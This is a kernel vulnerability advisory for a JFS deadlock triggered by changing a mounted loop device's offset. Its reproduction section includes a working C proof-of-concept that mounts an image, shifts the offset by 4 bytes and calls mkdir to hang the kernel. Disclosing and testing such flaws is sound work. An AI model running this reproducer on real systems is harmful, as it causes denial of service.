Linux Kernel JFS Deadlock Vulnerability Due to Incorrect Nlink Value Handling

Vulnerability

A deadlock vulnerability has been identified in the Linux kernel's JFS (Journaled File System) implementation. The issue arises when the LOOP_SET_STATUS64 ioctl (written ioctl$LOOP_SET_STATUS64 in syzkaller notation) is issued on a loop device that is already mounted, with an lo_offset that differs from the offset the filesystem was mounted at. The offset change shifts the mapping between the loop device and its backing file, so subsequent metadata reads return bytes from the wrong position in the image. When JFS next reads a disk inode it sees an nlink value of 0, and that value is copied unchecked into the in-memory inode allocation group (IAG) inode. When the kernel later attempts to free the inode it deadlocks. The vulnerability affects Linux kernel versions through 6.12.0-rc7.

Impact

Exploitation of this vulnerability leads to a deadlock: the task freeing the inode blocks on locks it already holds through a circular locking dependency, the JFS mount becomes unusable, and the system can become unresponsive. The effect is denial of service; no memory corruption or privilege escalation is involved. Triggering it requires write access to the loop device and the ability to mount the image, which on a default system means root.

Reproduction

The vulnerability can be reproduced by attaching a JFS image to a loop device and mounting it. Then issue LOOP_SET_STATUS64 on the same loop device with lo_offset set to 4, which does not match the offset the filesystem was mounted with; the loop device now serves the image shifted by 4 bytes, invalidating the mapping the mounted filesystem relies on. Next, create a directory, which forces JFS to allocate an inode. JFS reads the fixed disk inode in raw mode, but the metapage data returned is garbage relative to the on-disk layout, and the nlink value of 0 it contains is assigned to the IAG inode. Finally, the deadlock occurs when the kernel tries to free that inode: it is already holding locks that, combined with the ones the free path takes, form a circular dependency.
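The procedure above as a user-space program, added here as an example; it is not the syzkaller reproducer, not code from the kernel, and not part of this advisory. It also models in user space the check the Remediation section describes. Assumptions: the disk_inode_view struct is a deliberately simplified stand-in for the JFS on-disk inode (the real struct dinode has many more fields), the image is mounted at offset 0, and the exact error a fixed kernel returns from mkdir is not known from the advisory, so the program only reports whether the call returned. On a vulnerable kernel the mkdir call never returns; run it only as root in a throwaway VM.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <linux/loop.h>

/* Simplified stand-in for the JFS on-disk inode (assumption for illustration;
 * the real struct dinode in the kernel has many more fields). */
struct disk_inode_view {
    uint32_t di_nlink;
    uint32_t di_mode;
};

/* The check the Remediation section calls for, modelled in user space:
 * an nlink of 0 on a disk inode being copied into the IAG inode is corrupt
 * metadata. Returns 0 if acceptable, -EIO (kernel-style negative errno) if not. */
int check_disk_nlink(uint32_t disk_nlink)
{
    return disk_nlink == 0 ? -EIO : 0;
}

/* Copy nlink from the disk inode to the IAG inode only after it passes the check,
 * so a corrupt value never reaches the free path that deadlocks. */
int copy_iag_nlink(const struct disk_inode_view *dip, uint32_t *iag_nlink)
{
    int rc = check_disk_nlink(dip->di_nlink);
    if (rc)
        return rc;            /* IAG inode left untouched */
    *iag_nlink = dip->di_nlink;
    return 0;
}

/* Step 2 of the reproduction: the loop_info64 that moves the mapping.
 * Only lo_offset is set; every other field stays zero. */
struct loop_info64 make_offset_info(uint64_t offset)
{
    struct loop_info64 info;
    memset(&info, 0, sizeof info);
    info.lo_offset = offset;
    return info;
}

/* Attach image_fd to a free loop device; writes its path and returns the device fd, or -1. */
static int attach_loop(int image_fd, char *path, size_t pathlen)
{
    int ctl = open("/dev/loop-control", O_RDWR);
    if (ctl < 0)
        return -1;
    int n = ioctl(ctl, LOOP_CTL_GET_FREE);
    close(ctl);
    if (n < 0)
        return -1;
    snprintf(path, pathlen, "/dev/loop%d", n);
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;
    if (ioctl(fd, LOOP_SET_FD, image_fd) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* usage: ./repro <jfs-image> <mount-point>   (root, throwaway VM only) */
int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <jfs-image> <mount-point>\n", argv[0]);
        return 2;
    }
    int image_fd = open(argv[1], O_RDWR);
    if (image_fd < 0) { perror("open image"); return 1; }

    char dev[32];
    int loop_fd = attach_loop(image_fd, dev, sizeof dev);
    if (loop_fd < 0) { perror("attach loop"); return 1; }

    /* Step 1: mount the loop device as JFS (offset 0). */
    if (mount(dev, argv[2], "jfs", 0, NULL) < 0) { perror("mount"); return 1; }

    /* Step 2: shift the mapping by 4 bytes underneath the live mount. */
    struct loop_info64 info = make_offset_info(4);
    if (ioctl(loop_fd, LOOP_SET_STATUS64, &info) < 0) { perror("LOOP_SET_STATUS64"); return 1; }

    /* Step 3: force an inode allocation. A vulnerable kernel never returns from
     * this call; a fixed kernel should reject the corrupt metadata instead. */
    char path[4096];
    snprintf(path, sizeof path, "%s/d", argv[2]);
    if (mkdir(path, 0700) < 0)
        perror("mkdir returned an error (expected on a fixed kernel)");
    else
        puts("mkdir returned successfully");
    return 0;
}
```

The loop setup, mount and ioctl calls are the standard Linux interfaces (LOOP_CTL_GET_FREE, LOOP_SET_FD, LOOP_SET_STATUS64); the offset of 4 is the value from the reproduction above. Only copy_iag_nlink and make_offset_info are safe to exercise outside a VM.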

Remediation

The fix belongs in the kernel, not in user configuration: the nlink value read from the disk inode must be validated before it is copied into the IAG inode, and a value of 0 must be treated as corrupt metadata rather than propagated to the free path. Users should update to a kernel release that includes this check. Until then, note that the trigger requires the ability to reconfigure a mounted loop device, so limiting who can do that limits exposure.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 9.0
impact: 2.5
exploitability: 5.7
remediation: 0.0
relevance: 0.0
threat: 4.8
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.